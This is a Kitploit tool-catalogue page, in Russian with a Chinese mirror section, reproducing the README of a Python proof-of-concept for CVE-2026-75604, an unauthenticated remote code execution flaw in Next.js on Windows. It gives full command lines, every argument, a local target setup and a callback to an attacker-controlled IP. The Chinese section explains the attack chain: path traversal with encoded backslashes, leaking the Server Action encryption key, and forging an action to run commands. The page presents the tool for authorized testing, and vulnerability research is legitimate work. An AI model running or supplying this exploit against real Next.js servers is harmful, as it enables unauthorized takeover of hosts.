Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-75604 — Доказательство концепции эксплуатации для CVE-2026-75604 — неаутентифицированного удалённого выполнения кода (RCE) в Next.js, размещённом на Windows, через обход пути в кэше и поддельное Server Action, предназначенное для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/hackspeak/cve-2026-75604
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubhackspeak/cve-2026-75604

CVE-2026-75604

Доказательство концепции эксплуатации для CVE-2026-75604 — неаутентифицированного удалённого выполнения кода (RCE) в Next.js, размещённом на Windows, через обход пути в кэше и поддельное Server Action, предназначенное для авторизованного тестирования безопасности.

Репозиторий
11 день назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-75604 RCE PoC

Python-концепт-доказательство для CVE-2026-75604 — неаутентифицированное удалённое выполнение команд в приложениях Next.js, размещённых на Windows, которые используют одновременно Pages Router и App Router без Cache Components.

Демонстрация

CVE-2026-75604 RCE proof of concept

Требования

  • Next.js >=13.4 <15.5.24 или >=16.0 <16.3.3
  • Нативный сервер Windows
  • Pages Router и App Router без Cache Components
  • Файловый кэш по умолчанию с динамическим ISR-маршрутом Pages и динамическим кэшируемым маршрутом App
  • Совместимое замыкание-привязанное Server Action
  • Python 3.9+ и адрес обратного вызова, доступный для цели

Проверено на [email protected].

root@kitploit:~
python -m pip install -r requirements.txt

Использование

root@kitploit:~
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP --pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE --app-cache-path /PATH/TO/APP_CACHE_INSTANCE

Путь Server Action по умолчанию — /. Используйте --action-field, когда его форма содержит более одного поля.

Обязательные аргументы:

  • --target URL: базовый URL приложения Next.js
  • --callback-ip ADDRESS: IPv4-адрес, доступный для цели
  • --pages-cache-path PATH: существующая динамическая ISR-страница Pages Router
  • --app-cache-path PATH: существующая динамическая страница App Router, поддерживаемая файловым кэшем

Необязательные аргументы:

  • --command COMMAND: команда для выполнения; по умолчанию whoami
  • --action-path PATH: страница App Router, содержащая совместимое Server Action; по умолчанию /
  • --action-field NAME: поле формы, потребляемое действием; определяется автоматически, если неоднозначность отсутствует
  • --callback-port PORT: порт обратного вызова; по умолчанию 4331
  • --listen-address ADDRESS: локальный адрес привязки обратного вызова; по умолчанию 0.0.0.0
  • --timeout SECONDS: таймаут запроса и обратного вызова; по умолчанию 20
  • --insecure: отключает проверку сертификатов TLS

Локальная цель

Необязательное приложение target/ фиксирует [email protected] и использует стандартный производственный сервер Next.js:

root@kitploit:~
cd target
npm ci
npm run build
npm start

Запустите PoC в другом терминале:

root@kitploit:~
python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed

Необязательная цель предоставляет требуемые маршруты и совместимое Server Action на /.

Отказ от ответственности

Данный PoC предоставлен исключительно в образовательных целях, для исследований в области безопасности и авторизованного тестирования. Используйте его только на системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение.

Авторы

Благодарность evolutionstorm.

Данный PoC был независимо восстановлен на основе публичного уведомления и патча Next.js.


分发镜像说明(中文)

本仓库为 CVE-2026-75604 利用 PoC 的中转分发镜像(英文使用说明见上方上游原版 README)。内容由上游公开 PoC 镜像而来,仅作存档与分发用途。PoC 仅供安全研究、漏洞验证与授权测试,请勿用于未授权目标。

漏洞简述 / Vulnerability Summary

  • CVE-2026-75604 / GHSA-p293-qw3h-jr36:Windows 宿主上的 Next.js 未授权远程代码执行
  • 弱点分类:CWE-22(路径遍历)
  • CVSS:9.0(Critical),AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
  • 受影响:Next.js >=13.4 <15.5.24、>=16.0 <16.3.3
  • 修复版本:15.5.24 / 16.3.3
  • 触发前置:Windows 文件系统 + Pages Router 与 App Router 共存(未启用 Cache Components)+ 默认文件系统缓存 + 动态 ISR Pages 路由 + 缓存 App 路由 + 兼容的闭包绑定 Server Action

核心原理:FileSystemCache 在 Windows 上未把反斜杠(\)视为路径分隔符进行转义,攻击者可用 ..%5C 编码穿越缓存路径,读取私密文件 server-reference-manifest.json,泄露 Server Action 的 encryptionKey,再伪造闭包绑定 Server Action 请求执行任意命令。

环境要求 / Requirements

  • Python 3.9+
  • python -m pip install -r requirements.txt(cryptography、requests)
  • 目标可回连的攻击机 IPv4 地址
  • 满足上述前置条件的 Windows 目标应用

已在 [email protected] 上验证。

用法 / Usage

root@kitploit:~
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP \
  --pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE \
  --app-cache-path /PATH/TO/APP_CACHE_INSTANCE
参数必填说明
--target URL是Next.js 应用基础 URL
--callback-ip ADDRESS是目标可回连的 IPv4 地址
--pages-cache-path PATH是已存在的动态 Pages Router ISR 页(穿越锚点)
--app-cache-path PATH是已存在的、走文件系统缓存的动态 App Router 页
--command COMMAND否要执行的命令(默认 whoami)
--action-path PATH否含兼容 Server Action 的 App Router 页(默认 /)
--action-field NAME否Action 表单消费的业务字段(唯一时自动检测)
--callback-port PORT否回连端口(默认 4331)
--listen-address ADDRESS否本地回调监听地址(默认 0.0.0.0)
--timeout SECONDS否请求与回调超时(默认 20)
--insecure否关闭 TLS 证书校验

本地示例目标 / Local target

仓库内 target/ 提供了可复现的示例应用(锁定 [email protected],标准生产服务器):

root@kitploit:~
cd target
npm ci
npm run build
npm start

另开终端运行:

root@kitploit:~
python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 \
  --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed

示例目标提供了所需路由与 / 上的兼容 Server Action。

免责声明 / Disclaimer

本 PoC 仅供教学、安全研究与授权测试使用,仅可对自有或获得明确授权的系统运行。利用会在目标 Windows 主机执行任意命令,请在可销毁环境中测试。

归属与许可 / Attribution & License

  • 原 PoC 作者:rafabd1(公开上游镜像仓库)。
  • 漏洞报告者:evolutionstorm、B0RI。
  • 本 PoC 依据公开 Advisory 与 Next.js 修复补丁独立重建。
  • 分发仓库采用 MIT License(见 LICENSE)。

参考链接 / References

  • 上游 PoC 镜像:https://github.com/rafabd1/CVE-2026-75604-poc
  • GitHub Security Advisory:https://github.com/vercel/next.js/security/advisories/GHSA-p293-qw3h-jr36
  • 修复 commit(file-system-cache.ts + escape-path-delimiters.ts):https://github.com/vercel/next.js/commit/09f9c8a758a6b20f248b0e90e539bba8225c73bb
  • NVD:https://nvd.nist.gov/vuln/detail/CVE-2026-75604
Скачать инструмент